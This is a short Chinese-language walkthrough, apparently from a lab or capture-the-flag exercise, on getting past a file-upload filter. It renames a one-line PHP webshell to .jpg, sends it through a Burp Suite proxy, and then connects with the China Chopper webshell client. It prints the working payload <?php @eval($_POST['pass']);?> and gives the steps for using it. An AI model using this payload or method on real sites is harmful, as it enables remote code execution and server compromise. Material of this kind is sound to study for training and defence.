使用工具：burp suite and 中国菜刀
首先上传一个一句话木马.php文件试一下水
说明不允许上传，只允许上传.jpg,.png,.gif文件，那么我们把.php文件改为.jpg文件，打开代理再次上传

然后复制图片地址，打开中国菜刀

把地址粘贴进去，后面写入你一句话木马里 <?php @eval($_POST['pass']);?>我这里是pass,脚本类型选择php然后添加，双击进入。